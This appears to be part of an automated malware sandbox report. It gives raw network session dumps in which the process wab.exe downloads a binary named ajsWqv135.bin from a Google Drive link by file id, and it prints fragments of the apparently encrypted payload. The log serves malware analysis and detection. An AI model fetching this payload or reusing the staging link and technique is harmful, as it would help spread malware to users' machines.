                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 66 36 66 65 64 50 46 76 41 39 4e 31 46 78 4b 55 78 66 50 77 38 32 5a 4b 77 71 66 6b 45 30 4d 4d 35 48 46 38 67 52 6a 79 66 44 4e 69 62 55 2f 4d 48 6e 6e 34 54 56 45 58 44 57 4a 50 76 4e 69 42 58 52 47 66 4d 51 6b 58 72 2f 38 61 72 49 43 69 48 7a 37 44 57 48 6d 34 4f 49 71 6a 44 6a 50 30 71 64 6f 64 6b 47 59 2b 44 79 42 31 2f 38 68 76 6e 4b 46 36 38 43 38 6f 65 6d 53 59 57 73 6e 70 6a 51 56 73 71 4b 50 30 44 6f 62 33 4c 78 70 43 77 78 41 47 68 76 63 51 42 6f 62 33 45 41 61 47 39 78 41 47 68 50 31 41 52 54 54 6c 58 55 78 65 73 35 4a 51 6b 79 75 42 42 6c 41 51 56 6d 46 55 30 55 55 2b 6a 76 63 53 37 42 39 65 46 77 47 30 64 70 5a 62 70 38 45 62 31 37 66 6b 4b 33 56 5a 47 76 78 46 33 30 66 32 4c 58 65 4d 75 35 73 50 65 50 50 44 34 5a 66 51 52 6d 50 66 79 78 33
                                                                      Data Ascii: f6fedPFvA9N1FxKUxfPw82ZKwqfkE0MM5HF8gRjyfDNibU/MHnn4TVEXDWJPvNiBXRGfMQkXr/8arICiHz7DWHm4OIqjDjP0qdodkGY+DyB1/8hvnKF68C8oemSYWsnpjQVsqKP0Dob3LxpCwxAGhvcQBob3EAaG9xAGhP1ARTTlXUxes5JQkyuBBlAQVmFU0UU+jvcS7B9eFwG0dpZbp8Eb17fkK3VZGvxF30f2LXeMu5sPePPD4ZfQRmPfyx3
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 63 72 46 4d 64 46 36 4c 62 56 45 65 33 78 49 55 33 68 71 4c 56 5a 4f 58 48 46 79 36 53 64 31 55 58 45 50 4e 4f 52 6c 77 4a 48 6f 78 6a 49 78 70 4f 30 4c 74 52 75 7a 71 53 6f 66 77 34 4f 73 61 34 48 30 70 69 76 57 57 4a 4a 38 61 4c 74 4d 74 73 35 56 75 56 46 2f 38 41 49 37 44 2f 34 37 58 77 79 71 64 33 67 4e 47 62 41 51 6f 4b 4d 31 54 50 6b 42 6a 54 30 48 63 45 77 78 75 43 74 33 48 68 45 2f 35 50 30 61 58 4c 66 4f 36 67 67 6f 31 73 6b 41 66 47 50 54 61 63 6b 32 46 6f 50 34 66 79 6b 54 75 56 50 6a 43 57 39 78 41 45 62 72 4d 35 37 64 6c 56 31 59 61 57 39 43 42 35 34 78 6f 48 4f 74 61 47 4a 74 76 4e 67 34 74 6f 71 41 32 6d 53 58 6a 6e 41 32 62 78 68 7a 6a 51 48 41 57 63 46 4e 76 44 42 7a 54 74 75 66 70 72 41 36 68 52 54 33 33 6c 35 2b 45 73 35 71 78 4b 30 38
                                                                      Data Ascii: crFMdF6LbVEe3xIU3hqLVZOXHFy6Sd1UXEPNORlwJHoxjIxpO0LtRuzqSofw4Osa4H0pivWWJJ8aLtMts5VuVF/8AI7D/47Xwyqd3gNGbAQoKM1TPkBjT0HcEwxuCt3HhE/5P0aXLfO6ggo1skAfGPTack2FoP4fykTuVPjCW9xAEbrM57dlV1YaW9CB54xoHOtaGJtvNg4toqA2mSXjnA2bxhzjQHAWcFNvDBzTtufprA6hRT33l5+Es5qxK08
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 75 34 7a 51 48 59 67 53 71 69 59 7a 2b 6c 4e 46 6b 47 39 62 2f 6d 62 6c 51 69 55 68 58 32 76 79 42 6e 77 74 52 78 67 4b 74 47 73 42 48 59 77 78 69 74 69 72 55 48 55 6d 75 7a 6d 53 6e 46 78 33 33 66 6a 59 5a 63 56 41 63 31 39 4c 34 32 77 43 50 34 38 38 43 56 59 47 67 43 53 62 65 69 68 76 74 71 42 4c 2b 5a 76 36 4c 72 36 79 70 7a 4f 64 41 73 31 41 4c 2f 69 72 39 42 6a 78 4a 54 65 7a 61 62 58 68 61 6a 5a 6e 79 76 50 34 39 30 46 79 55 37 47 39 57 31 6d 71 45 39 57 4d 66 46 4b 65 64 6d 6a 49 6f 72 5a 59 61 34 68 59 62 52 41 34 44 47 77 72 57 52 69 39 44 65 49 6c 44 7a 41 4a 52 35 2f 78 35 4c 79 42 68 52 39 72 35 64 46 38 71 6f 66 53 44 41 67 56 71 41 57 49 36 5a 4e 47 6f 30 39 4e 41 38 37 49 44 6f 72 75 33 52 57 37 39 34 53 5a 6b 72 61 4e 48 34 6b 35 54 53 38
                                                                      Data Ascii: u4zQHYgSqiYz+lNFkG9b/mblQiUhX2vyBnwtRxgKtGsBHYwxitirUHUmuzmSnFx33fjYZcVAc19L42wCP488CVYGgCSbeihvtqBL+Zv6Lr6ypzOdAs1AL/ir9BjxJTezabXhajZnyvP490FyU7G9W1mqE9WMfFKedmjIorZYa4hYbRA4DGwrWRi9DeIlDzAJR5/x5LyBhR9r5dF8qofSDAgVqAWI6ZNGo09NA87IDoru3RW794SZkraNH4k5TS8
                                                                      2024-04-18 08:10:59 UTC1255INData Raw: 50 57 75 38 51 6c 52 4b 75 4c 62 30 68 50 53 31 75 67 43 52 72 36 6c 51 43 45 77 4e 6a 66 31 6a 74 63 54 4e 66 4b 65 6a 6a 47 31 56 4d 68 76 62 38 32 4a 51 72 51 45 42 38 45 4a 6e 51 57 79 43 79 44 41 4a 6f 30 65 65 53 43 74 4b 65 67 36 68 72 36 49 42 6f 62 33 45 41 61 47 39 78 41 47 68 76 63 51 42 6f 62 31 4e 4f 48 6f 2b 78 66 56 46 54 33 38 49 36 64 44 7a 51 61 4c 7a 6a 4c 61 72 48 51 76 6e 50 6f 6b 4d 55 68 71 52 73 70 6c 72 50 44 65 35 65 65 4f 6d 67 46 4c 59 77 71 4a 52 50 41 63 4f 2b 53 64 6a 55 54 30 30 4a 41 43 35 49 50 33 57 33 36 77 61 31 51 4d 73 34 2f 32 47 52 36 31 4c 5a 64 2b 49 6f 4f 73 52 52 34 4f 56 4a 7a 59 61 41 45 32 74 71 6c 58 33 42 71 39 46 57 53 6a 43 63 53 4d 4b 4f 58 4c 6c 2f 4d 50 36 56 4f 77 41 6f 62 30 41 41 43 67 41 41 43 67
                                                                      Data Ascii: PWu8QlRKuLb0hPS1ugCRr6lQCEwNjf1jtcTNfKejjG1VMhvb82JQrQEB8EJnQWyCyDAJo0eeSCtKeg6hr6IBob3EAaG9xAGhvcQBob1NOHo+xfVFT38I6dDzQaLzjLarHQvnPokMUhqRsplrPDe5eeOmgFLYwqJRPAcO+SdjUT00JAC5IP3W36wa1QMs4/2GR61LZd+IoOsRR4OVJzYaAE2tqlX3Bq9FWSjCcSMKOXLl/MP6VOwAob0AACgAACg


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      2          | 192.168.2.6 | 49710       | 64.233.185.138 | 443              | 7068 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-04-18 08:11:43 UTC | 216 | OUT | GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: drive.google.com
                                                                      Cache-Control: no-cache
                                                                      2024-04-18 08:11:43 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                      Content-Type: application/binary
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 18 Apr 2024 08:11:43 GMT
                                                                      Location: https://drive.usercontent.google.com/download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                      Content-Security-Policy: script-src 'nonce-6BXt2lSu1_y_d2VbOzQaGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Server: ESF
                                                                      Content-Length: 0
                                                                      X-XSS-Protection: 0
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      X-Content-Type-Options: nosniff
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                      3          | 192.168.2.6 | 49711       | 74.125.138.132 | 443              | 7068 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-04-18 08:11:44 UTC | 258 | OUT | GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Cache-Control: no-cache
                                                                      Host: drive.usercontent.google.com
                                                                      Connection: Keep-Alive
                                                                      2024-04-18 08:11:45 UTC | 4752 | IN | HTTP/1.1 200 OK
                                                                      X-GUploader-UploadID: ABPtcPrfdEDa2vI0OVmTLscil7sFSycrjox1T_z88X0zR1QhpHQ9cgiJVH_q0j1detOPUNHfE51X_fAHBA
                                                                      Content-Type: application/octet-stream
                                                                      Content-Security-Policy: sandbox
                                                                      Content-Security-Policy: default-src 'none'
                                                                      Content-Security-Policy: frame-ancestors 'none'
                                                                      X-Content-Security-Policy: sandbox
                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                      Cross-Origin-Resource-Policy: same-site
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Disposition: attachment; filename="ajsWqv135.bin"
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Credentials: false
                                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 244800
                                                                      Last-Modified: Thu, 18 Apr 2024 03:05:33 GMT
                                                                      Date: Thu, 18 Apr 2024 08:11:45 GMT
                                                                      Expires: Thu, 18 Apr 2024 08:11:45 GMT
                                                                      Cache-Control: private, max-age=0
                                                                      X-Goog-Hash: crc32c=tXduBw==
                                                                      Server: UploadServer
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close
                                                                      2024-04-18 08:11:45 UTC4752INData Raw: 21 d0 ba b4 77 7c 57 95 24 b2 8c 38 84 fd 1e 04 91 7b ba 67 ae 59 fa aa a2 4f cb f4 42 f7 8c b2 5c 83 b3 e0 46 b9 54 d4 d0 f2 11 7f 26 1d e6 bc dd 06 4a 80 7a 16 c7 80 2a 9e 01 f7 6e 9b ca 18 f3 4a 30 f2 66 40 4c f2 d1 21 e7 0e 02 44 78 5b ed ca a2 17 6a 4a 6c 0e 3c d1 30 d2 57 63 5b f3 ba 7f 67 b3 c9 ba 60 09 ee 19 75 93 ec 6b 12 a4 de 8a 95 bd 51 de 8f d4 33 b4 6e d0 61 30 98 9b 13 0a 8c 2a f8 5c 98 da 05 8a c5 ec d5 0a bf a9 6a 95 25 95 75 b2 bf 66 57 5e 8d b6 c4 33 09 4d 34 72 03 ca d3 24 49 77 2e 53 bc 91 6d c1 63 14 79 ac 29 72 36 ea 2f 2c de 77 2c 11 98 90 61 d6 56 37 2f b3 e6 9e 00 54 1c da dc 0e 02 77 23 da ca 3a fc a1 72 3f 4c 05 2e a9 0b c0 26 36 ea 1a 9e b4 ef 9e 6c a8 e6 f6 5d c4 07 de c2 86 d6 56 f1 9f f7 a9 ae c5 cb 4f aa ed 72 7c 8b 39 77
                                                                      Data Ascii: !w|W$8{gYOB\FT&Jz*nJ0f@L!Dx[jJl<0Wc[g`ukQ3na0*\j%ufW^3M4r$Iw.Smcy)r6/,w,aV7/Tw#:r?L.&6l]VOr|9w
                                                                      2024-04-18 08:11:45 UTC4752INData Raw: 41 94 10 a0 f4 5c 30 b3 0d 2a 01 e3 0e fd bb 86 55 55 ca a2 e9 66 4a 6c 2e 70 d1 30 d2 a9 62 62 e0 ba 7f 67 cd ca ba 60 0d 81 47 75 93 ea 4b 1f a4 de 8a 6b b3 51 de 8f 2a 3f b4 6e f0 e0 30 98 9b e3 14 0f 2a f8 e8 91 3f 2c 30 c4 a6 38 29 eb c1 03 18 0b e5 07 dd 26 18 36 33 8d df a5 5d 67 dc 41 6b 72 af f3 56 42 16 0e 3a d6 88 ab 8e 30 34 34 c8 4d 17 18 19 2c 26 fa 77 d2 1d 98 90 41 de 06 72 2f 4d ab a6 10 54 74 90 b9 3a 02 77 25 5a c8 3a fc a5 b2 36 4e 04 25 56 0e c0 26 84 17 16 9e bc cf 9a 6c a8 e6 08 92 2d 0a de c2 a6 fe 42 f1 7f fe 89 ab c5 8b 4f 54 c3 72 7c 8b c5 7b 31 fa f9 a0 5f 68 63 96 5a be 5c 1c cd 9a a6 a0 2a e4 31 0f 76 1a 44 85 2b 51 35 fb 30 b3 f4 49 2f f6 81 d6 5e d0 e5 93 7a 0d 5b 43 27 a9 29 ca e1 7d 73 13 9f a5 3d e8 d7 a3 9b 9d 64 27 69
                                                                      Data Ascii: A\0*UUfJl.p0bbg`GuKkQ*?n0*?,08)&63]gAkrVB:044M,&wAr/MTt:w%Z:6N%V&l-BOTr|{1_hcZ\*1vD+Q50I/^z[C')}s=d'i
                                                                      2024-04-18 08:11:45 UTC443INData Raw: 98 9b 3d 37 36 24 f8 16 9f 1b 24 32 3a ac 14 2b cb d9 03 e6 05 1b 06 e4 f8 14 36 33 53 d9 a1 5d b7 2a 40 52 60 87 c5 56 3c 13 26 0d d2 b1 23 70 3e 34 14 e3 54 17 18 e7 dc 28 f6 77 2c ef 94 9c 61 f6 09 72 2f b3 54 9e 3a 5a 74 90 ca 50 f2 74 23 da ea 2a fc a1 92 c1 40 08 25 a8 fe cc 2a 84 c9 1e 9e bc ef 60 6d 91 c4 f6 93 14 fa d4 c2 a6 fe 6d f1 7f fe 89 be c5 8b 4f c0 95 5a 40 8b 3b 7d cf f4 dd a0 7f 6d 63 68 5b 79 58 10 cd 9a 58 8c 27 e4 11 13 88 14 44 7b 2a 96 10 fb 30 93 07 44 29 f6 04 93 67 d5 e1 6d 76 32 5e 63 27 a9 11 f9 e1 8f 8a 39 f7 d6 3b e8 80 8a a6 9d 66 2d 49 5e 3e 51 6b 3a 33 07 7e 16 da 0b 89 49 61 3c 1b a4 01 20 3d 45 cc 70 fc 65 da e5 84 2c 46 8c 04 78 e9 12 8e bb 00 37 9a 89 a7 f1 a6 68 0f f2 1a ea 60 c3 ef 1c 54 b5 c2 55 dd 1b f8 b7 37 14
                                                                      Data Ascii: =76$$2:+63S]*@R`V<&#p>4T(w,ar/T:ZtPt#*@%*`mmOZ@;}mch[yXX'D{*0D)gmv2^c'9;f-I^>Qk:3~Ia< =Epe,Fx7h`TU7
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 2a 97 b5 0e e2 e0 32 ce 5a 0f 6d 3a 4f 9b 56 5d 55 84 a7 ab f5 5e cc ac 69 87 28 2f 78 ad 70 4c 57 28 b3 15 49 18 db ff 24 5f 70 d9 31 2e 17 27 be 6a 0c ba 9a 08 a1 17 fa 49 04 cd c1 84 aa 09 2a 81 96 b3 89 56 66 66 12 e8 6b f0 46 2b 4c b0 e7 e8 1d a3 36 c0 37 86 98 3d 1e 91 3e 39 3d 85 28 8e 34 df e0 8c 03 dc 28 13 f2 93 02 d6 a7 86 a3 4a 7e c0 a0 46 bc f4 f1 b0 c4 22 af 4d 21 f4 12 d1 53 ae f3 07 41 ec 5b dd 7a 34 cf e6 c2 c5 b5 4c 39 ab f1 86 ca 12 86 bb 10 df 69 b2 39 bd 24 6d e2 6b 27 c6 50 40 e9 48 b3 85 14 85 77 6e ad b0 df c9 e5 f5 64 09 18 97 a8 50 c3 a9 31 ba d8 d8 92 04 18 13 43 7a 9e 8e 37 33 92 4a 10 f6 86 91 75 fd 52 6d 17 93 da bd af ea be 16 ff 74 94 9d 8c 7a cc e2 ea 8b a0 5a a8 f3 db 02 e0 a0 04 22 88 6e 87 0c 6f fa 2d a6 5b 32 05 24 82
                                                                      Data Ascii: *2Zm:OV]U^i(/xpLW(I$_p1.'jI*VffkF+L67=>9=(4(J~F"M!SA[z4L9i9$mk'P@HwndP1Cz73JuRmtzZ"no-[2$
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 63 f4 a5 8b 5e 1c 33 94 a3 80 d5 e8 35 0f f6 33 44 85 2f 51 35 fe 30 fc a0 49 2f fc 81 db 63 d5 8a c9 7a 35 54 9e 21 a9 11 f9 39 5f 8c 39 8c 95 45 ca 84 a2 9f b5 9d 26 69 45 14 51 6b c4 7c 6f 7e 16 24 07 85 49 94 23 1b a4 87 de 3c 7c 81 71 fc 65 22 e9 80 2c 6f b2 04 79 e3 ec 80 b3 7f 16 ba 89 a8 f1 58 66 8d f3 1a 14 6a cf ef 3c 5f b5 c2 54 23 1a c1 b9 f1 14 3c ce 27 e0 8e fa 4a c2 49 ad aa 90 cc 5a 36 61 96 43 4d 82 a3 9c 78 b5 45 86 de bd 00 dd d4 87 68 e3 d0 6c f8 be 05 3f b9 3c 70 69 33 8d 7c 42 25 ee cc eb 80 52 bf 7f 0b 23 7c 9c 01 11 3f 46 10 b1 37 cb 46 3a 59 16 99 3c 54 8f f3 ab f2 df be e3 ce dd f6 25 0e be a4 ce 1a a6 50 86 8f bb cc d5 ee d2 a9 9a 2b 13 9e 0f 4b d1 8f eb 7a 2b 63 c0 aa 67 34 a4 24 e0 e4 95 92 00 9a 57 31 67 d9 0e d6 3b 18 10 c8
                                                                      Data Ascii: c^353D/Q50I/cz5T!9_9E&iEQk|o~$I#<|qe",oyXfj<_T#<'JIZ6aCMxEhl?<pi3|B%R#|?F7F:Y<T%P+Kz+cg4$W1g;
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: a0 d1 ff ac 1f 36 99 50 43 fd 51 c4 20 02 7c 02 19 82 d6 c9 15 a5 98 c0 4d dc ef 7f e1 38 4f 53 73 b1 ec c1 81 2a 52 08 67 2b 3e 1a b2 55 a9 a1 d5 22 ad fe 7b da 9a 83 71 37 bd 0a 0f 4a ca 06 79 c2 dc 96 30 d1 26 a6 f9 16 7d 20 f1 b1 fd 84 de f6 96 71 9c 1f 2f c5 e2 72 2d 5d d3 b5 09 c2 3c 7b 63 52 ac a6 a2 10 9f 0b ad 7a 82 10 69 be 30 a1 f2 65 40 b2 fc d4 21 3a 5e fd bb 78 86 53 ca a2 17 4c 97 6c 0e 7c d1 10 d2 57 63 5b d9 9a 7d 67 b3 c9 44 6e 0d ee 19 8b 9f e8 6b 32 a4 de 8a 95 43 50 e7 85 d4 33 b4 6e f0 e0 30 98 9b e3 1b 32 24 f8 16 9d 13 24 12 c6 a0 18 2b 15 c0 3a e3 05 e5 07 e5 dd 14 36 33 95 9a 5a a2 98 dc 4c 53 61 85 f2 46 3c 19 0e 3a cd b1 7c fa 30 32 15 c3 4d 16 0b d7 21 26 ce 75 2c 11 94 90 61 c7 26 72 2f b3 aa 61 0d 50 74 a8 34 69 02 77 23 24
                                                                      Data Ascii: 6PCQ |M8OSs*Rg+>U"{q7Jy0&} q/r-]<{cRzi0e@!:^xSLl|Wc[}gDnk2CP3n02$$+:63ZLSaF<:|02M!&u,a&r/aPt4iw#$
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: f1 ed ca 6f f9 7e 05 84 f0 2e a6 d2 34 bf 16 02 1f e0 72 70 58 dd b1 2b 71 81 81 c8 69 84 81 57 da 03 2d 6b b4 3a e6 2e 95 e0 95 e9 b3 b2 dc d9 20 d7 fc 68 0a f6 f5 fb 19 6b e4 62 44 16 cf 29 47 a4 c6 b4 53 79 7e 11 41 ae 8d 2b 3e 17 cb b7 ba 18 0f af 8e d6 b5 f0 dc e0 c6 a9 f6 a6 52 07 61 18 28 ee 97 8f e5 36 f4 ad 0f 20 41 8a fd 43 09 1d 9c c4 c9 8d 08 86 47 d3 25 a6 b2 28 db 9f b6 5b 84 52 11 24 ba 23 c3 ea 46 1c 3a 39 e5 3e dc 2d fa d8 9f d6 71 f6 4c 8a e8 61 e0 e3 da 0e 16 87 8d 52 cb eb 00 4d 6f b9 8a 1a 55 6c ed 55 f8 c5 63 73 fe e4 9b d8 ec 7f 90 83 3c ce 14 71 26 b3 5c 33 4d d2 af 0a 72 33 d0 ac 32 bb ce 1f 51 75 a9 4e e2 24 e3 d9 0b aa 40 b3 1d 22 01 99 12 7f 3d 7a ce 2a ef 37 10 d2 0f 35 8b 8f dc 40 c3 4d 0a e3 37 c3 25 f6 df af 0e 2c 9a 68 50
                                                                      Data Ascii: o~.4rpX+qiW-k:. hkbD)GSy~A+>Ra(6 ACG%([R$#F:9>-qLaRMoUlUcs<q&\3Mr32QuN$@"=z*75@M7%,hP
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: ab 2b a0 19 37 fb da 07 a7 b6 23 08 60 03 ff 38 38 e2 00 13 89 43 89 ee 09 f1 66 cd 87 96 83 58 3d 6a d7 98 a9 4e fe 40 5d db 45 7a b2 3f 26 d9 6b 3f 50 8a c2 e8 b9 13 08 34 8e f8 71 44 e2 3d 0b 5e ad 8a fb 24 b2 d9 57 22 cf 9d 85 8f f0 cf e4 56 a0 3d 73 d8 40 e1 a5 36 ba 4f 02 3e 2c f4 4c 02 91 a5 df 9c 85 37 ea f1 ab c8 2a 0a 30 3f 8e 09 57 0d 6c 78 63 3c 61 ae 2d ce 6b c7 b3 73 4e 49 7c c0 50 a3 43 7c 21 fa f5 06 4f 24 f6 c3 c5 a0 80 cf 50 96 2e 21 5b 02 05 e0 cc df 7c 23 08 ad d4 1e c4 01 ec 15 d5 c2 f9 d3 57 fd 24 83 74 d7 57 ba ce b7 b5 3b 55 c8 ab 1a 5f 6e 5e 39 d3 41 53 86 7c 6b 7d 45 ce 21 a8 df 45 2c 51 e5 55 50 bf 18 bd f0 58 79 d4 01 be 99 fc 6b 31 27 80 55 a8 05 36 0e 7d 33 a4 7d 37 14 1a b8 14 5c 19 73 9d 17 b3 8a 44 aa 94 ca ff f2 a4 4f 4f
                                                                      Data Ascii: +7#`88CfX=jN@]Ez?&k?P4qD=^$W"V=s@6O>,L7*0?Wlxc<a-ksNI|PC|!O$P.![|#W$tW;U_n^9AS|k}E!E,QUPXyk1'U6}3}7\sDOO
                                                                      2024-04-18 08:11:45 UTC1255INData Raw: 52 65 79 24 03 78 8d 77 4c a9 29 74 1e 70 16 db ff 04 66 65 db 31 d0 39 2f be 6a f2 48 94 04 81 14 04 45 08 33 e0 b6 af 09 2a 7f af 8f 92 56 66 5e 83 1b 90 0f 44 63 7c b2 ed 1f 5a a3 36 c0 c9 88 89 1d 3e 9d 3e 39 c3 75 26 82 0c ee 1e 80 0f dc f6 01 f2 93 22 28 a6 bf ad b4 7f f9 92 48 be f4 f1 b0 da 22 af 4d 21 f4 1e d1 53 ae f3 0b 41 ec 4b dd 7a 34 cf e6 c2 ce b5 4c 39 ab 1b 87 ca 12 9e 63 ef 20 96 b2 3e b1 24 16 7a 67 2b c2 0e 28 e9 48 b9 53 60 bc 79 64 94 bf e7 19 e4 0b 6d 29 02 ec ce 50 3d a3 15 84 d8 26 98 2e c5 39 59 7a 9e 70 c0 32 ab 47 66 f6 86 65 a5 d3 52 bc 0d 93 da bd 87 98 be 3a 85 5c a9 9d 8c 70 69 eb da 88 a2 08 a6 f5 db 22 fb a0 04 20 05 73 8b 0c 65 79 54 aa 5b 16 12 56 b9 24 c5 9e d0 90 8a 43 df 33 b3 5f 5e f8 49 6f 5c 9b 64 a7 5b c3 6b bd
                                                                      Data Ascii: Rey$xwL)tpfe19/jHE3*Vf^Dc|Z6>>9u&"(H"M!SAKz4L9c >$zg+(HS`ydm)P=&.9Yzp2GfeR:\pi" seyT[V$C3_^Io\d[k
